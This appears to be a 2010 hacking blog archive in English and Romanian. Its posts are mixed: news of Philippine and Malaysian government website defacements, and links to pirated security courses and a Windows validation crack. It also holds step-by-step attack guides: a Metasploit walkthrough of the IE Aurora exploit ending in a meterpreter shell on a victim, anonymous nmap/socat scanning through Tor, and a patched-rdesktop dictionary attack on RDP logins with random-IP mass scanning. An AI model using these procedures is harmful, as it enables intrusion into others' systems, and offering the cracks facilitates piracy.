pyth0n3

Friday, January 15, 2010 Update: DEP blocks this sample and the Metasploit module; DEP is enabled by default in IE 8. Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts. To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold: msf > use exploit/windows/browser/ie_aurora msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ie_aurora) > set LHOST (your IP) msf exploit(ie_aurora) > set URIPATH / msf exploit(ie_aurora) > exploit [*] Exploit running as background job. [*] Started reverse handler on port 4444 [*] Local IP: http://192.168.0.151:8080/ [*] Server started. msf exploit(ie_aurora) > Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console: [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514) msf exploit(ie_aurora) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WINXP\Developer meterpreter > use espia Loading extension espia...success. meterpreter > screenshot aurora.bmp meterpreter > shell Process 892 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Developer\Desktop> metasploit.com

11-01-2010 MANILA, Philippines - Hackers struck again, this time, defacing the home page of the Technical Education and Skills Development Authority (TESDA) website, www.tesda.gov.ph. Hackers put up two pages on the TESDA home page. The first one had a header that read: "Nakikiramay kami sa pagpanaw ng Iskolar ng Bayan, freedom fighter na si Kimay". The first page also contained an illustration of a man giving the middle finger, then the text at the end of the page read: "Ano ba gagamitin sa eleksyon?" The second page posted greetings from Ventureslink and directed visitors to Smartmatic, the Commission on Elections' (Comelec) partner for the automated polls. This is not the first time government websites have been hacked. The websites of the Department of Health, Department of Social Welfare and Development, Department of Justice, the Philippine National Police's (PNP) Criminal Investigation and Detection Group, and the Information Technology and Electronic Commerce Council were also hacked last month. Malacañang said it is concerned about these incidents of hacking and has instructed the Comelec and other agencies to take steps to secure their websites. DOH website hacking On December 17, users visiting the Department of Health (DOH) website found a picture of Health Sec. Francisco Duque III apparently holding genitals towards his mouth. On the upper left corner of the picture, which accompanied a press release about the DOH's firecracker ban campaign, was a drawing of a penis with the words "Use Penis" next to it. The original picture showed Duque blowing on a "torotot" or horn. The DOH encouraged the public to make noise with horns or pans instead of using firecrackers, in order to minimize firecracker-related injuries. Before the DOH website could be fixed, the tampered picture was quickly spread in social networking sites. The next day, alleged Indonesian hackers broke into the official website of the Department of Social Welfare and Development (DSWD). The DSWD home page displayed a large picture of a green and glowing Grim Reaper bearing the words "Hacker-newbie.org", a Bahasa forum reportedly for hacker communities. More recently, the National Disaster Coordinating Council's official website was also hacked by "Heart Hacker." Viewers visiting the agency's home page instead saw a black-and-gray message box proclaiming that the site had been hacked. -- with reports from TJ Manotoc, ABS-CBN News; ANC

Desigur multi din voi cunosc Tor si Vidalia ,si stiu cum sa navigheze in mod anonim in internet . Tor-rezolve este un tool care poate rezolva un hostname intrun IP , in acest caz pt multi care vor sa faca acest lucru si sa fie in acelasi timp mai discreti vor folosi desigur acest tool sau oricare altul care va permite sa faca acest lucu in anonimat.In nici un caz nu vor trimite pachete UDP sau ICMP de la propriul computer . Un exemplu in Linux: tor-resolve www.example.com 192.168.1.10 Vreau sa descriu in cateva cuvinte cum poate fi facut un simplu scan in anonimat folosind reteaua Tor sau orice alt proxy server . Aveti nevoie de proxychains ProxyChains - TCP and DNS through proxy server. HTTP and SOCKS Proxychains va forta orice tip de conexiune TCP de la orice fel de tool veti folosi ca sa utilizeze reteaua Tor sau orice alt proxy server . Aici aveti anumite dezavantaje deoarece proxychains poate fi folosit doar pt TCP ,prin protocolul UDP nu va merge .In acest caz se poate folosi ca scanner Nmap . Il veti putea folosi cu optiunea -sT , -PN daca sunteti sigur ca acest host e alive .Optiunea -n va asigura in asa fel incat nici un rezolver DNS va fi facut in afara retelei Tor . -sV va fi folosit pt a afla ce fel de service si ce fel de version sunt pe fiecare port deschis . -p va fi folosit pt a specifica porturile pt scan .Avand in vedere faptul ca Tor este foarte lent va trebui sa alegeti anumite porturi care va intereseaza mai mult. EX: proxychains nmap -sT -PN -n -sV -p 21,23,80,139 192.168.1.10 Daca vreti sa faceti diverse query unui server web puteti folosi netcat impreuna cu proxychains ,la care va conectati pe portul 80. Un tool interesant pe care l-am gasit e socat socat care poate fi folosit ca sa transfere pachete TCP prin proxy SOCKS Tor care sta in listen pe portul 9050 Avantajul acestui tool este ca se poate realiza o conexiune care persista cu serverul web al victimei , un fel de tunnel. Deci vom putea folosi ,Nessus, Wikto pt a face orice fel de query vrem la serverul cu care suntem conectati in mod anonim . Acest comand configureaza un proxy socat in sistemul local (127.0.0.1)pe portul 8080 si va face ca orice fel de pachete TCP pt victima 192.168.1.10 portul 80 sa treaca prin proxy Tor SOCKS care e in listen pe 127.0.0.1 portul 9050 socat TCP4-LISTEN:8080,forck SOCKS4a:127.0.0.1:192.168.1.10:80,socksport=9050 & Va intereseaza ce version de Apache are serverul web de pe 192.168.1.10 ? Va conectati cu netcat la 127.0.0.1 8080 EX: nc 127.0.0.1 8080 Dupa care scrieti “HEAD/HTTP/1.0”si dati enter de doua ori. Socat va functiona daca aveti ip static ,sau folositi un dyndns.

Pe RST gasiti toate resursele care va trebuie pt a afla parola

Este una singura si nu e admin:2

OK pt ca eu in rubrica Challenges mi-am pus parola din sistemul meu linux ,eu sunt un user care nu stie sa isi puna un pass mai tare si ma asteptam sa mil spuna cineva pt ca l-am uitat si nu mai pot sa intru acum .(ma poate ajuta cineva ,sau trebuie sa formatez in acest caz?),stiu insa ca parola mea se poate gasi in orice wordlist pt ca e foarte simpla.E aici daca se gandeste cineva sa ma ajute http://rstcenter.com/forum/18676-decode-2-a.rst

Nu ezitati sa va uitati si la acest discurs pe care Johnny Long la avut la Defcon17 Johnny Long's talk at DefCon 17 on Vimeo

January 7, 2010 Microsoft will issue one bulletin on Patch Tuesday next week that is rated "critical" for Windows 2000. The patch is designed to address a vulnerability that could allow an attacker to take control of a computer by remotely executing code on it, according to an advisory released Thursday. It is rated "low" severity for Windows 7, Vista, XP, Server 2003, and Server 2008 operating systems. Meanwhile, Adobe Systems is scheduled to release a patch for a vulnerability in Adobe Reader and Acrobat on Tuesday that was discovered in mid-December and which is being exploited by attacks in the wild to deliver Trojan horse programs that install backdoor access on computers. Adobe will also be releasing a beta test version of a new automatic updater for Reader and Acrobat on Tuesday, according to ZDNet, sister publication of CNET. The move is welcome, given that Reader was found to be one of the buggiest programs in 2009. news.cnet.com

E interesant , merita vizionat si cred ca multi au de a face cu asa ceva .Am cateva experiente cu cateva persoanet care incearca sa foloseasca The Art Of Deception ,dai ei stiu doar ce le-a fost spus ca sa zica numai ca au 20, 30 de ani de experienta in domeniu.Folosesc diverse tecnici religioase.e ca si cum m-am uitat intro oglinda cand am vazut video .Multi din noi au putina experienta pt ca sunt foarte tineri si nu au reusit sa invete destul ca sa poata trece peste anumite lucruri ,Social Engineering va fi tot timpul punctul cel mai slab al omului.Multi pe care i-am cunoscut au trecut la alte culturi religioase si nu mai sunt aceeasi pe care i-am cunoscut o data pt ca ma evita .Alti incearca sa ma convinga pe mine si imi spun ca persoanele pe care le frecventez sunt impotriva mea , imi spun ca probabil prietena mea nu ma lasa sa vin la ei ,pt ca eu nu merg .Ma fac sa ma simt vinovat de ceva ,chiar daca de ex eu nu fumez pt ca stiu ca face rau dar sunt vinovat de faptul ca nu merg la ei ,ma preseaza cu anumite chestii ,imi spun ca eu inainte de a vb cu ai faceam parte dintro religie falsa si multe altele ,de aceea anumite video ca acesta pot fi de ajutor pt multi .Inca o data va recomand mergeti sa vedeti acest video .

Content: * About this Course * Audience and Prerequisites Understanding UNIX * What is UNIX? * UNIX History * Which UNIX? * UNIX Architecture Understanding the UNIX Shell * What is the UNIX Shell? * Which Shell? * Logging In * Basic Commands * Command Syntax * Getting Help * Logging Out Files and Directories * Working with Files and Directories * Commands for Files and Directories Tutorials 1 * Commands for Files and Directories 2 * Filenames and File Types * Wildcards 1 * Wildcards 2 * Displaying File Contents * Comparing Files * Copying, Moving and Renaming Files * Deleting Files * Unix Hidden Files * The "." and ".." Directories * Relative vs Absolute Paths * Working with Directories * Finding Files * Archiving Files Unix Security * Users and Groups * Security Related Problems * File Protection Overview Tutorials 1 * File Protection Overview 2 * Changing File Permissions * Changing File Ownership * Changing File Group * A Dangerous Security Loophole Combining Programs - Pipes and Filters * Introduction to Combining Programs * Standard Output * Standard Input * Standard Input and Output * About Filters * Common Filters * Searching for Text in Files * Standard Error Process Control * About Processes 1 * About Processes 2 * Running Commands Asynchronously * Killing Processes * Jobs * More Process Control * Scheduling Commands vi - A UNIX Text Editor * Understanding vi * Starting vi * Manipulating Files in vi Tutorials 1 * Manipulating Files in vi 2 * Moving Around 1 * Moving Around 2 * Unix Basic Editing 1 * Basic Editing 2 * Basic Editing 3 * Advanced Editing Tutorials 1 * Advanced Editing 2 * Configuring vi 1 * Configuring vi 2 The UNIX File System * Introduction to the Unix File System * How Files are Stored * Understanding Links 1 * Understanding Links 2 * Linking Files * Unix Symbolic Links Tutorials 1 * Symbolic Links 2 * UNIX File Types * Mounting 1 * Mounting 2 Communication * Using telnet in Unix * Using mail Customising Your Unix Shell Environment * Changing your Login Shell * Environment Variables 1 * Environment Variables 2 * Your PATH 1 * Your PATH 2 * Your Prompt * Your .profile * Command-line Editing * Korn Shell Command-line Editing * Shell Customisation Options Tutorials 1 * Shell Customisation Options 2 * The End Download: http://www.mediafire.com/file/42znmw1km4w/Unix_shellFundamentals.part1.rar http://www.mediafire.com/file/dzrddkvjwyo/Unix_shellFundamentals.part2.rar http://www.mediafire.com/file/gzo0imtjjzy/Unix_shellFundamentals.part3.rar http://www.mediafire.com/file/wmzzlcydjn0/Unix_shellFundamentals.part4.rar http://www.mediafire.com/file/vlziidmzmml/Unix_shellFundamentals.part5.rar Il veti gasi si pe alte diverse site-uri .Eu l-am luat de pe url si am facut upload aici pe mediafire .

Descarca acest program si incearca ,are un browser incorporat si poti sa tranformi in ce format vrei tu video yds.7z poti sa descarci de pe site-uri diverse ,ai si cele mai cunoscute sit-uri de video predefinite in browser Pass: insecure

Info:Professor Messer’s Nmap Secrets Training Course | Professor Messer Content: Module 01 - Getting Started with Nmap Module 02 - Nmap Basics Module 03 - Scans for Every Occasion Module 04 - Back Pocket Scans Module 05 - Useful Scanning Options Module 06 - Nmap Pings - The Search for Hosts Module 07 - Recon Scanning Module 08 - Ninja Scanning Module 09 - Output Options Module 10 - Windows and Nmap Module 11 - Real-World Nmap Scanning + Bonus Content All in 552,5 MB video .flv format (stuctured in htm menu page format) Download rapidshare http://rapidshare.com/files/255612391/NMap_Secrets_Training.part1.rar http://rapidshare.com/files/255612045/NMap_Secrets_Training.part2.rar http://rapidshare.com/files/255612558/NMap_Secrets_Training.part3.rar http://rapidshare.com/files/255612147/NMap_Secrets_Training.part4.rar http://rapidshare.com/files/255612400/NMap_Secrets_Training.part5.rar http://rapidshare.com/files/255612030/NMap_Secrets_Training.part6.rar Download filefactory http://www.filefactory.com/file/ahde9af/n/NMap_Secrets_Training_part1_ra... http://www.filefactory.com/file/ahde9ae/n/NMap_Secrets_Training_part2_ra... http://www.filefactory.com/file/ahde9ac/n/NMap_Secrets_Training_part3_ra... http://www.filefactory.com/file/ahde9ag/n/NMap_Secrets_Training_part4_ra... http://www.filefactory.com/file/ahde9ah/n/NMap_Secrets_Training_part5_ra... http://www.filefactory.com/file/ahde9ab/n/NMap_Secrets_Training_part6_ra...

Navigand in internet am gasit acest link in care sunt cateva video interesante si m-am gandit sa il pun The Very Angry Toad

Content: SQL Injection What is SQL Injection Exploiting Web Applications SQL Injection Steps What Should You Look For What If It Doesn't Take Input OLE DB Errors SQL Injection Techniques How to Test for SQL Injection Vulnerability How Does it Work BadLogin.aspx.cs Executing Operating System Commands Getting Output of SQL Query Getting Data from the Database Using ODBC Error Message SQL Injection in Oracle SQL Injection in MySql Database Attack Against SQL Servers SQL Server Resolution Service (SSRS) Osql L-Probing SQL Injection Tools SQL Injection Automated Tools Blind SQL Injection Blind SQL Injection: Countermeasures SQL Injection Countermeasures Preventing SQL Injection Attacks Download: http://rapidshare.com/files/331771208/sql_injection.7z.001 http://rapidshare.com/files/331778791/sql_injection.7z.002 http://rapidshare.com/files/331785290/sql_injection.7z.003 http://rapidshare.com/files/331791850/sql_injection.7z.004 http://rapidshare.com/files/331793214/sql_injection.7z.005 Pass: ins3cur3

Published: Thursday January 7, 2010 PETALING JAYA: The Malaysian Judiciary’s website was discovered hacked and defaced on Thursday night and its homepage substituted with a threat to not pursue the issue of the Catholic weekly the Herald’s use of the word “Allah.” The hacker, using the handle “Brainwash,” defaced the site with a bright-red headline saying “TakeDown by Brainwash!” and what can only be described as “creative” use of the English language. Blazed across the page in huge letters was “Mess with the best, die like the rest.” The hacker also wrote: “Allah only restricted to Muslim only. Dont touch us as we dont touch you. Unless ....” http://thestar.com.my/archives/2010/1/7/nation/hacked.jpg It was followed by a threatening postscript at the bottom of the page “To the court, Brain know you postponed it but if you wise enough then you should drop it.” The hacker also posted a picture of a woman, bent over suggestively, apparently “washing” a brain. Bar Council committee member Edmund Bon has labelled the act as “unwarranted and unacceptable.” He said hacking and defacing websites was a criminal offence under the Computer Crimes Act 1997. “The comments appear to put undue pressure on the judiciary to decide the case in a certain way and this should not be tolerated in a civil society. “The Bar Council is all for allowing discussions and criticisms over court decisions so long as they are done in a civil manner. This threat intends to put pressure on the judiciary and it has overstepped the freedom of discussion boundaries,” he said when contacted. The Herald website has also been hacked three times after the decision by High Court Justice Lau Bee Lan on allowing the word “Allah” to be used in the publication’s Malay-language edition. Her decision has sparked anger and ire from various Muslim groups. Some groups have even threatened to stage gatherings on Friday to protest against the ruling. The Home Ministry has appealed the decision and has been granted a stay of execution on Justice Lau’s ruling. De facto law minister Datuk Seri Nazri Abdul Aziz could not be reached for comment as at press time. By YENG AI CHUN THESTAR.COM

Download: Genuine.Advantage.Validation.v1.8.31.0..rar

E singurul browser predefinit pe Linux ,imi trebuie un emulator pt Explorer

Voi descrie o mica guida cum sa gasiti un service Terminal Server si sa efectuati un dictionary attack dintrun sistem Linux.Metode sunt mai multe ,aici voi descrie doar una .Voi folosi ca tool rdesktop 1.4.1 pt. Linux la care va trebui adaugata o patch pt a putea efectua dictionary attack. Rdesktop 1.4.1 il pueti gasi pe internet dar aici va pun un link de unde il puteti lua avand si un file de patch incorporat rdesktop-1.4.1.tar Primul lucru care trebuie sa faceti e sa gasiti un terminal server , care de o default e pe portul TCP 3389 Puteti folosi urmatorul comand pt Nmap ,sau depinde ce scanner folositi voi . nmap -oN TerminalServer.txt -p 3389 --open 192.168.0.0/24 unde in loc de 192.168.0.0/24 veti specifica ip-urile care vreti sa scannati .Nmap va salva totul intrun file TerminalServer.txt . Un alt command e: nmap -PS3389 -iR 0 -p 3389 --open -oN TerminalServer.txt in loc de 0 puneti cate ip vreti ca sa scaneze.(de default 0 va scana la infinit) Si in acest caz Nmap salveaza totul in TerminalService.txt ,Optiunea - - open e ca sa arate doar open service. Dupa ce aveti destule obiective veti trece la faza nr 2 Dictionary attack. Descarcatii rdesktop-1.4.1.tar . Va trebui sa scoateti din archiva cu comandul tar -xf rdesktop-1.4.1.tar Dupa care mergeti unde ati desfacut archiva , cd rdesktop-1.4.1 Si dati urmatorul comand pt patch patch -p1 -i rdp-brute-force-r422.diff Acum va trebui sa compilati : ./configure make make install dupa ce ati terminat dati comandul rdesktop si va va arata toate optiunile. Ex : rdesktop -u administrator -p pass.txt 192.168.1.1 unde pass.txt este dictionar de cuvinte Un administator va configura in asa fel incat unele vor permite doar cateva tentative si vor inchide restul . Acest lucru este ilegal ,ar fi bine sa fiti autorizati inainte de a face un scan pe orice retea. Totul poate fi salvat intrun file log. Am scris aceasta guida cu scop informativ ,doar cunoscand ceea ce face inamicul se pot lua masuri.

Am pus acest post pt ca vazusem multe persoane care nu erau in grad sa faca diverse query pt. a cauta cu google ,oricum explica pt incepatori cum sa cauti cu google si cred ca multi nu stiu

DefCon 15 - T112 - No-Tech Hacking DefCon 15, Las Vegas 2007 No-Tech Hacking Johnny Long

Google Guide is an online interactive tutorial and reference for experienced users, novices, and everyone in between. I developed Google Guide because I wanted more information about Google's capabilties, features, and services than I found on Google's website.--Nancy Blachman Interactive online Google tutorial and references - Google Guide

Parola e buna faceti atentie sa nu aveti CAPS LOCK activat sau o puneti in graba si diverse alte motive....

Aici puteti descarca Wikto ,un tool care foloseste GHDB pt a scanna diverse site-uri ,pt al folosi va trebui sa descarcati si un proxy de pe aceeasi pagina ,jos care se chiama SPUD .Pt documentation mergeti la acest url http://www.sensepost.com/research/wikto/using_wikto.pdf Va trebui sa va inregistrati ca sa puteti face download ,e gratuit. Download : http://www.sensepost.com/research/wikto/

sunt de origine rusa dar m-am nascut in Romania .Stau in Torino Nu am fost de 7 ani in Romania

Uite aici Application failed to initialize (0x0000135) - Powered By Kayako eSupport Zice ca trebuie sa instalezi NET Framework Apropo pt dez-instalat software ,trebuie facut cu grija si acest proces .Sunt multe software Uninstaler mult mai bune decat softwar-ul de default in windows care nu e in grad sa dez-instaleze complet programele .Unul care e gratuit si foarte cunoscut e revo http://www.revouninstaller.com care are si un scanner pentru a analiza daca a mai ramas ceva din programul care vreti sa il dez-installati Probati-il si vedeti care e diferenta si cate key de registru va raman in calculator fara ca sa va dati seama